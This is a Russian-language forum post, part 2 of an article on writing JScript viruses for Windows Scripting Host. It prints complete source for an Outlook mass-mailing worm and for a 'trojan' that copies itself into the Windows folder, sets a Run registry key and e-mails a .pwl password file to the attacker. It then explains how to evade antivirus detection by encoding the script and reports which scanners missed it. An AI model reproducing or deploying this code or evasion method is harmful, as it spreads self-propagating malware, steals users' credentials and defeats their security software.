| Dr_Web | Дата: Среда, 07.09.2011, 12:20 | Сообщение # 1 |
|
1
Группа: Пользователи
Сообщений: 105
Статус: Offline
| Часть 2. - Исследование новых возможностей
В ходе написания первой статья я столкнулась с проблемами при тестировании
написанных скриптов, установленный AVP Script Checker на любую попытку
сохранить файл с командами копирования файла с локальной машины, пересылки через
электронную почту, попытки прочитать реестр, выдавал сообщение о наличии в этом
файле новых модификаций различных вирусов. Создавалось впечатление, что AVP
надежно стоит на страже наших интересов, и я решила проверить, действительно ли
это так?
При изучении документации к Windows Scripting Host(WSH), я обратила внимание на
абзац где было сказано, что корпорацией Microsoft был создан независимый от языка
скрипт – хост, который позволял строить аналоги .bat файлов на VBScript, JScript и
других скриптовых языках, например, Active Perl или Python. На их сайте про Active Perl
или Python ничего сказано не было но про JScript было написано довольно подробно,
сравнив возможности VBScript и JScript, стало понятно, что они идентичны и
отличаются только синтаксисом языка.
Переписать скрипт с одного языка программирования в другой было делом техники, в
результате получилось:
Каркас E-mail worm
var fileSysObject, file;
fileSysObject = new ActiveXObject("Scripting.FileSystemObject");
file = fileSysObject.GetFile(WScript.ScriptFullName);
var outlookObject, outMail, index;
outlookObject = new ActiveXObject("Outlook.Application");
for (index = 1; index < 50; index++){
outMail = outlookObject.CreateItem(0);
outMail.to =
OutlookObject.GetNameSpace("MAPI").AddressLists(1).AddressEntries(index);
outMail.Subject = "Тема сообщения";
outMail.Body = "Тело сообщения";
OutMail.Attachments.Add(WScript.ScriptFullName);
outMail.Send;}
Каркас "троянского коня"
var fileSysObject, file;
fileSysObject = new ActiveXObject("Scripting.FileSystemObject");
file = fileSysObject.GetFile(WScript.ScriptFullName);
file.Copy("c:windowsI_am_virus.vbs");
var wshShell;
wshShell = new ActiveXObject("WScript.Shell");
wshShell.RegWrite("HKEY_LOCAL_MACHINESoftwareMicrosoftWindows _
CurrentVersionRunServicesvirus", "c:windowsI_am_virus.vbs");
var outlookObject, outMail, index;
outlookObject = new ActiveXObject("Outlook.Application");
for (index = 1; index < 50; index++){
outMail = outlookObject.CreateItem(0);
outMail.to =
OutlookObject.GetNameSpace("MAPI").AddressLists(1).AddressEntries(index);
outMail.Subject = "Тема сообщения";
outMail.Body = "Тело сообщения";
OutMail.Attachments.Add(WScript.ScriptFullName);
outMail.Send;}
outMail = outlookObject.CreateItem(0);
outMail.to = "Ваш E-mail";
outMail.Subject = "Тема сообщения";
outMail.Body = "Тело сообщения";
outMail.Attachments.Add("Путь к .pwl файлу");
outMail.Send;
AVP молчал 
Однако при выполнении скрипта Script Checker выдал сообщение, что этот файл
возможно содержит вирус и заблокировал его выполнение. Покопавшись еще я
выяснила, что он реагирует на попытку отослать файл по почте, так как и в VBScript, и
в JScript строка OutMail.Attachments.Add(WScript.ScriptFullName) выглядит одинаково.
Избавиться от этого удалось, закодировав скрипт программой MS Windows Script
Encoder.
Скрипт был проверен на трех самых распространенных антивирусных программах
Norton AntiVirus, AVP и Dr.Web. Первые две успешно промолчали, и только Dr.Web,
отфильтровал его, как потенциально опасный, сработал знаменитый эвристический
анализатор.
На основе сделанного анализа можно предположить, что нас ждет следующий виток
эпидемий связанных с написанием вирусов на JScript.
моя новая почта dr.web597278899@mail.ru и моя новая ася 636311100
|
| |
| |
